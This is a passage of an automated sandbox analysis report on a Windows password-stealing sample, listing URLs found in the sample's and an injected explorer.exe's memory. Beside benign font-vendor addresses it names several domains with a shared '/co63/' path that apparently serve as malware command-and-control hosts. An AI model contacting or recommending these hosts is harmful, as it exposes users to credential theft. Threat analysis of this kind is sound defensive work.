00000000.00000003.392383105.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392213201.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392322140.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392547177.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/$
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/6
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392066294.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391405610.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391867029.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392020681.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391280868.0000000005751000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392117186.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/=
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391405610.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391280868.0000000005751000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/A
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/adnl
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391405610.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391280868.0000000005751000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/es-ew
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392066294.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391867029.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392020681.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392117186.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392066294.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392167050.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391867029.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392276202.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392786588.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392020681.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392926230.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392117186.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392383105.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392213201.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 
00000000.00000003.392322140.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392547177.0000000005757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/$
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/=
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/H
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/n-u
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391405610.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/rtr~
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mattewigs.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mattewigs.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mattewigs.com/co63/www.dulichphucbinh.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mattewigs.comReferer:
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mazinhoccb.com
          Source: explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mazinhoccb.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mazinhoccb.comReferer:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.393919703.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398187272.000000000578D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398367935.000000000578D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398296937.000000000578D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myccsmartmove.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myccsmartmove.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myccsmartmove.com/co63/www.takealicense.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myccsmartmove.comReferer:
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naspewt.xyz
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naspewt.xyz/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naspewt.xyz/co63/www.mattewigs.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naspewt.xyzReferer:
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pym479.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pym479.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pym479.com/co63/www.creativebrea.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pym479.comReferer:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.387837697.000000000575B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com-
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.387823212.000000000575B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comu
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.saleschildcarriers.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.saleschildcarriers.com/co63/
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.saleschildcarriers.com/co63/www.ballthingsez.com
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.saleschildcarriers.comReferer:
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.takealicense.com
